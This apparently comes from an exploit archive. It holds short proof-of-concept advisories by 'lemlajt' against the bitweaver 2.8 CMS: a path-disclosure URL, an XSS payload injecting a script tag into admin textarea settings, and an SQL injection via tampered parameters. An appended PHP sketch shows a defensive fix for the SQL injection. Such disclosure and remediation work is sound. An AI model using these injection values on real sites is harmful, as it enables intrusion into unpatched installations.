2011-02-22 12:37 24_persistant.xss_bitweaver2.8.1.txt
2011-02-25 19:31 26_path.disclosure_bitweaver.2.8.txt
2011-02-25 22:29 27_sql_bitweaver.2.8.txt

Code:
# exploit title: Path Disclosure bitweaver 2.8 
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve : 
#

 
PoC : 

http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27 



bonus: xss 
POST http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>
Code:
# exploit title: sql injection in bitweaver 2.8 
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver @ sourceforge
# version: 2.8
# tested on: linux
# cve : 
#

 
PoC : 

1. Go to:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Data Tamper:
$find		= ' sql
$sort_mode	= 
$format_guid	= 
$list_page	= 

;/
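
A defensive sketch for the parameters tampered with in the SQL injection PoC above, added here as an example and not taken from the post or from bitweaver's code: `sort_mode` is parsed as `<column>_<asc|desc>` against an allow-list, and `find` is bound as a LIKE parameter instead of being concatenated. The table name `quicktags`, the `taglabel` column, the helper names and the sample rows are assumptions made for the example.

```php
<?php
// Added example, not bitweaver code. Table and column names are assumptions,
// except "tagpos", which comes from the sort_mode value in the PoC URL.
// Requires the pdo_sqlite extension for the in-memory demo database.

const SORTABLE = ['tagpos', 'taglabel'];   // assumed allow-list of sortable columns

// Turn "tagpos_asc" into a safe ORDER BY fragment, or fall back to a default.
function orderBy(string $sortMode): string {
    if (preg_match('/\A([a-z_]+)_(asc|desc)\z/', $sortMode, $m)
        && in_array($m[1], SORTABLE, true)) {
        return $m[1] . ' ' . strtoupper($m[2]);
    }
    return 'tagpos ASC';
}

// Search quick tags: $find is bound, never concatenated; LIKE wildcards are escaped.
function findTags(PDO $db, string $find, string $sortMode, string $formatGuid): array {
    $like = '%' . addcslashes($find, '\\%_') . '%';
    $sql  = 'SELECT taglabel, tagpos FROM quicktags '
          . "WHERE format_guid = :guid AND taglabel LIKE :find ESCAPE '\\' "
          . 'ORDER BY ' . orderBy($sortMode);
    $st = $db->prepare($sql);
    $st->execute([':guid' => $formatGuid, ':find' => $like]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE quicktags (taglabel TEXT, tagpos INTEGER, format_guid TEXT)');
$db->exec("INSERT INTO quicktags VALUES ('bold', 2, 'tikiwiki'), ('it''alic', 1, 'tikiwiki')");

// A lone quote in $find is treated as data and bound into the LIKE pattern.
var_dump(findTags($db, "'", 'tagpos_asc', 'tikiwiki'));
// A sort_mode that does not match the expected shape falls back to the default.
var_dump(orderBy('tagpos_asc; --'));
```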